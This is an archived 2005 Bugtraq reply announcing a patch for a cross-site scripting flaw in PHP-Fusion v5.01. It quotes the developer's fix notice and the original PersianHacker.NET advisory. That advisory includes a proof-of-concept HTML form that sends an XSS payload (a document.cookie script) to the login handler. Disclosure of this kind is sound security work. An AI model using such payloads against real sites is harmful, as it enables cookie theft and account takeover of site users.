lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: 19 Mar 2005 21:38:51 -0000
From: Sheldon King <sheldon@...eblitz.com>
To: bugtraq@...urityfocus.com
Subject: Re: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection
    Vulnerability


In-Reply-To: <20050319082025.28662.qmail@....securityfocus.com>

The main developer Digitanium was notified, a patch has been developed and released on the main website.

Quote from Main Developer Digitanium at http://www.php-fusion.co.uk

Pi3cH has reported a cross-site-scripting vulnerability. PHP-Fusion does not properly validate user-supplied input passed by the log-in form in 'user_info_panel.php'.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHP-Fusion software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. It's believed this is related to the new login system I plan to implement officially in v5.02, but have made available as a mod for v5.01. The details are not exact so I have added a security fix to v5.01 to close this vulnerability. I know this is must be annoying for everyone, especially as this is the 3rd security issue inside a month.

You must ensure that you update the file fusion_core.php, you can get the very latest file from the service pack which is available from the downloads area. The sourceforge files have also been updated. If you prefer to update manually please click Read More for details. Thanks to Pi3cH for the heads up.

End quote


Regards
Sheldon King
PHP Fusion Beta Team


>Received: (qmail 6620 invoked from network); 19 Mar 2005 18:05:19 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
>  by mail.securityfocus.com with SMTP; 19 Mar 2005 18:05:19 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
>	by outgoing3.securityfocus.com (Postfix) with QMQP
>	id 7C19E237330; Sat, 19 Mar 2005 10:49:48 -0700 (MST)
>Mailing-List: contact bugtraq-help@...urityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@...urityfocus.com>
>List-Help: <mailto:bugtraq-help@...urityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@...urityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@...urityfocus.com>
>Delivered-To: mailing list bugtraq@...urityfocus.com
>Delivered-To: moderator for bugtraq@...urityfocus.com
>Received: (qmail 3178 invoked from network); 19 Mar 2005 01:01:33 -0000
>Date: 19 Mar 2005 08:20:25 -0000
>Message-ID: <20050319082025.28662.qmail@....securityfocus.com>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: PersianHacker Team <pi3ch@...oo.com>
>To: bugtraq@...urityfocus.com
>Subject: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection
>    Vulnerability
>
>
>
>[PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
>Date: 2005 March
>Bug Number: 10
>
>PHP-Fusion
>a light-weight open-source content management system (CMS) written in PHP. It utilises a mySQL database to store your site content and includes a simple, comprehensive adminstration system. PHP-Fusion includes the most common features you would expect to see in many other CMS packages
>More info @:
>http://php-fusion.co.uk/
>
>
>Discussion:
>--------------------
>The software does not properly validate user-supplied input in 'setuser.php'.
>
>A remote user can access the target user's cookies (including authentication cookies),
>if any, associated with the site running the PHP-Fusion software, access data
>recently submitted by the target user via web form to the site, or take actions
>on the site acting as the target user.
>
>
>Exploit:
>--------------------
><html>
>
><head>
><title>PHP-Fusion v5.01 Exploit</title>
></head>
>
><body>
>
><h1>PHP-Fusion v5.01 Html Injection Exploit</h1>
>
>
><form method="POST" action="http://www.example.com/setuser.php">
>  <b>XSS in register.php:</b><p>
>  Username:
>  <input type="text" name="user_name" size="48" value="XSS Injection Code"></p>
>  <p>
>  Password:
>  <input type="text" name="user_pass" size="48" value="XSS Injection Code"></p>
>  <p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br>
>  exmple: &lt;script&gt;document.write(document.cookie)&lt;/script&gt;</p>
>  <p>&nbsp;<input type='submit' name='login' value='RUN!' class='button'></p>
></form>
><p>&nbsp;</p>
><p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
>
></body>
>
></html>
>
>
>Solution:
>--------------------
>No solution was available at the time of this entry.
>
>
>Credit:
>--------------------
>Discovered by PersianHacker.NET Security Team
>by Pi3cH (pi3ch persianhacker net)
>http://www.PersianHacker.NET
>
>Special Thanks: devil_box(for xss article), amectris, herbod.
>
>
>Help
>--------------------
>visit: http://www.PersianHacker.NET
>or mail me @: pi3ch persianhacker net
>


Powered by blists - more mailing lists